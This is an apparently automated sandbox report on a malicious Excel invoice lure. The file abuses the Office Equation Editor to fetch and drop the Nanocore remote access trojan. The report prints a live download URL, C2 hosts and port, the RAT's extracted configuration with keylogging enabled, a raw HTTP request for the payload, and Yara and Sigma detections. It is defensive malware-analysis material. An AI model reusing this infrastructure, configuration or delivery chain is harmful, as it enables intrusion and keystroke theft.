Analysis Report SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx

Overview

General Information

Sample Name: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx
Analysis ID: 385193
MD5: 216f2652001700d1f7ac1109a508ce2d
SHA1: 82d3a0b7bb096d03f9f1a4de5444c216849d576b
SHA256: 9b393f90c5fa6aabf671d0f80a9ee0e4f44330cd3ee14dc0d9066f978d9435ff
Tags: VelvetSweatshop, xlsx

Detection

Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: NanoCore
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Nanocore RAT
.NET source code contains potential unpacker
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://covid19vaccinations.hopto.org/nano.exe Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000007.00000002.2395217863.00000000037E6000.00000004.00000001.sdmp Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "f57d5a77-8670-45ef-b736-5f3a07b6", "Group": "Addora", "Domain1": "79.134.225.30", "Domain2": "nassiru1155.ddns.net", "Port": 1144, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
Multi AV Scanner detection for domain / URL
Source: http://covid19vaccinations.hopto.org/nano.exe Virustotal: Detection: 12%
Multi AV Scanner detection for submitted file
Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx Virustotal: Detection: 29%
Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx ReversingLabs: Detection: 22%
Yara detected Nanocore RAT
Source: Yara match File source: 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2395217863.00000000037E6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2480, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2696, type: MEMORY
Source: Yara match File source: 7.2.RegSvcs.exe.380d42c.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.840000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.844629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.3811a55.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.840000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.380d42c.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.37494e8.4.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nano[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\gmSlQSien.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 7.2.RegSvcs.exe.400000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 7.2.RegSvcs.exe.840000.3.unpack Avira: Label: TR/NanoCore.fadte

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.pdbWindows\exe\RegSvcs.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: ystem.pdb- source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: =T3UpC:\Windows\System.pdbA!`y source: RegSvcs.exe, 00000007.00000002.2395879525.0000000004FDC000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\RegSvcs.pdbN source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: ps.pdb source: RegSvcs.exe, 00000007.00000002.2394056812.00000000008BD000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\dll\System.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: System.EnterpriseServices.Wrapper.pdb source: smtpsvc.exe, 00000008.00000002.2225121272.0000000001D90000.00000002.00000001.sdmp
Source: Binary string: C:\Windows\System.pdb``[ source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000007.00000003.2194043943.00000000006E3000.00000004.00000001.sdmp, smtpsvc.exe, smtpsvc.exe.7.dr
Source: Binary string: indows\System.pdbpdbtem.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: vbc.exe, 00000004.00000002.2194187602.0000000000B10000.00000002.00000001.sdmp, RegSvcs.exe, 00000007.00000002.2394185585.0000000002130000.00000002.00000001.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp

Software Vulnerabilities:

Allocates a big amount of memory (probably used for heap spraying)
Source: excel.exe Memory has grown: Private usage: 4MB later: 73MB
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 4_2_00B762C8
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 4_2_00B76408
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 4_2_00B763F8
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: covid19vaccinations.hopto.org
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 13.235.115.155:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 13.235.115.155:80

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: nassiru1155.ddns.net
Source: Malware configuration extractor URLs: 79.134.225.30
Uses dynamic DNS services
Source: unknown DNS query: name: nassiru1155.ddns.net
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 79.134.225.30:1144
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected:
    HTTP/1.1 200 OK
    Date: Mon, 12 Apr 2021 06:02:45 GMT
    Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.4.16
    Last-Modified: Mon, 12 Apr 2021 05:41:25 GMT
    ETag: "c3e00-5bfbff6ea5e4b"
    Accept-Ranges: bytes
    Content-Length: 802304
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: application/x-msdownload
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 79.134.225.30
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-02US
Source: Joe Sandbox View ASN Name: FINK-TELECOM-SERVICESCH
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
    GET /nano.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: covid19vaccinations.hopto.org
    Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 79.134.225.30
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D3B54A74.emf
Source: unknown DNS traffic detected: queries for: covid19vaccinations.hopto.org
Source: vbc.exe, 00000004.00000002.2202209803.0000000005540000.00000002.00000001.sdmp, RegSvcs.exe, 00000007.00000002.2395892834.0000000004FE0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2202209803.0000000005540000.00000002.00000001.sdmp, RegSvcs.exe, 00000007.00000002.2395892834.0000000004FE0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a raw input device (often for capturing keystrokes)
Source: RegSvcs.exe, 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected Nanocore RAT
Source: Yara match File source: 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2395217863.00000000037E6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2480, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2696, type: MEMORY
Source: Yara match File source: 7.2.RegSvcs.exe.380d42c.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.840000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.844629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.3811a55.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.840000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.380d42c.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.37494e8.4.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.2393755361.00000000005C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.2395217863.00000000037E6000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: vbc.exe PID: 2480, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: vbc.exe PID: 2480, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegSvcs.exe PID: 2696, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegSvcs.exe PID: 2696, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.RegSvcs.exe.380d42c.9.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.RegSvcs.exe.27d1644.7.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.840000.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.RegSvcs.exe.844629.4.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.5c0000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.RegSvcs.exe.3811a55.10.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.840000.3.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.380d42c.9.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.37494e8.4.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.37494e8.4.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nano[1].exe
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Memory allocated: 76D20000 page execute and read and write
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 4_2_006D088E NtQueryInformationProcess, 4_2_006D088E
Source: C:\Users\Public\vbc.exe Code function: 4_2_006D1E96 NtQuerySystemInformation, 4_2_006D1E96
Source: C:\Users\Public\vbc.exe Code function: 4_2_006D086C NtQueryInformationProcess, 4_2_006D086C
Source: C:\Users\Public\vbc.exe Code function: 4_2_006D1E63 NtQuerySystemInformation, 4_2_006D1E63
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_004F144A NtQuerySystemInformation, 7_2_004F144A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_004F140F NtQuerySystemInformation, 7_2_004F140F
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_011D85C8 4_2_011D85C8
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E8418 4_2_002E8418
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E6C48 4_2_002E6C48
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E4450 4_2_002E4450
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EED58 4_2_002EED58
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E6550 4_2_002E6550
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E75A8 4_2_002E75A8
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E55D9 4_2_002E55D9
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EDA30 4_2_002EDA30
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E5210 4_2_002E5210
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E5260 4_2_002E5260
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EA739 4_2_002EA739
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E4790 4_2_002E4790
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EDCC8 4_2_002EDCC8
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EB179 4_2_002EB179
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E9170 4_2_002E9170
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EA571 4_2_002EA571
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EA140 4_2_002EA140
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EA150 4_2_002EA150
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E9180 4_2_002E9180
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EA580 4_2_002EA580
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E5980 4_2_002E5980
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EE268 4_2_002EE268
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EA339 4_2_002EA339
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EA348 4_2_002EA348
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E9BB0 4_2_002E9BB0
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E9BC0 4_2_002E9BC0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00B71078 4_2_00B71078
Source: C:\Users\Public\vbc.exe Code function: 4_2_00B739B8 4_2_00B739B8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00B72FB8 4_2_00B72FB8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00B743A0 4_2_00B743A0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00B71500 4_2_00B71500
Source: C:\Users\Public\vbc.exe Code function: 4_2_00B73368 4_2_00B73368
Source: C:\Users\Public\vbc.exe Code function: 4_2_00B706C0 4_2_00B706C0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00B706C8 4_2_00B706C8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00B70070 4_2_00B70070
Source: C:\Users\Public\vbc.exe Code function: 4_2_00B71798 4_2_00B71798
Source: C:\Users\Public\vbc.exe Code function: 4_2_00B71789 4_2_00B71789
Source: C:\Users\Public\vbc.exe Code function: 4_2_00B74770 4_2_00B74770
Source: C:\Users\Public\vbc.exe Code function: 4_2_00B7497E 4_2_00B7497E
Source: C:\Users\Public\vbc.exe Code function: 4_2_00B74967 4_2_00B74967
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E0A28 4_2_002E0A28
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_003C2418 7_2_003C2418
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_003CB410 7_2_003CB410
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_003C38C8 7_2_003C38C8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_003C8AE8 7_2_003C8AE8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_003C3020 7_2_003C3020
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_003C9807 7_2_003C9807
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_003C30E7 7_2_003C30E7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_003C9740 7_2_003C9740
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
PE file contains strange resources
Source: nano[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: nano[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: nano[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: gmSlQSien.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: gmSlQSien.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: gmSlQSien.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Yara signature match
Source: 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.2393755361.00000000005C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.2393755361.00000000005C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000007.00000002.2395217863.00000000037E6000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: vbc.exe PID: 2480, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
